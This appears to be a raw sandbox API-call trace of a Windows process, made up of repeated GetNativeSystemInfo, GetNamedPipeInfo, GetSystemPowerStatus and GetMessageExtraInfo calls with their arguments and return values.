	[0126.281] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.281] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.281] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.281] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.281] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.281] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.281] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.281] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.281] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.282] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.282] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.282] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.282] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.282] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.282] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.282] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.282] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.282] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.282] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.282] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.282] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.283] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.283] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.283] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.283] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.283] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.283] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.283] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.283] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.283] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.283] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.283] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.284] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.284] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.284] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.284] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.284] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.363] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.363] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.363] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.363] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0129.027] lstrlenW (lpString="") returned 0
	[0129.027] GetMessageExtraInfo () returned 0x0
	[0129.036] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.036] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.036] GetMessageExtraInfo () returned 0x0
	[0129.043] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.043] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.043] GetMessageExtraInfo () returned 0x0
	[0129.044] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.044] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.045] GetMessageExtraInfo () returned 0x0
	[0129.047] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.047] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.047] GetMessageExtraInfo () returned 0x0
	[0129.076] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.076] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.076] GetMessageExtraInfo () returned 0x0
	[0129.099] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.099] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.099] GetMessageExtraInfo () returned 0x0
	[0129.100] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.100] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.100] GetMessageExtraInfo () returned 0x0
	[0129.125] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.126] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.126] GetMessageExtraInfo () returned 0x0
	[0129.127] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.127] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.127] GetMessageExtraInfo () returned 0x0
	[0129.192] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.193] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.193] GetMessageExtraInfo () returned 0x0
	[0129.199] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.199] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.199] GetMessageExtraInfo () returned 0x0
	[0129.204] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.204] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.204] GetMessageExtraInfo () returned 0x0
	[0129.221] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.221] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.221] GetMessageExtraInfo () returned 0x0
	[0129.243] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.243] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.243] GetMessageExtraInfo () returned 0x0
	[0129.256] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.257] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.257] GetMessageExtraInfo () returned 0x0
	[0129.280] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.280] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.280] GetMessageExtraInfo () returned 0x0
	[0129.282] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.282] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.282] GetMessageExtraInfo () returned 0x0
	[0129.284] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.284] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.284] GetMessageExtraInfo () returned 0x0
	[0129.286] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.286] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.286] GetMessageExtraInfo () returned 0x0
	[0129.287] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.287] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.287] GetMessageExtraInfo () returned 0x0
	[0129.287] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.287] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.288] GetMessageExtraInfo () returned 0x0
	[0129.288] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.288] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.288] GetMessageExtraInfo () returned 0x0
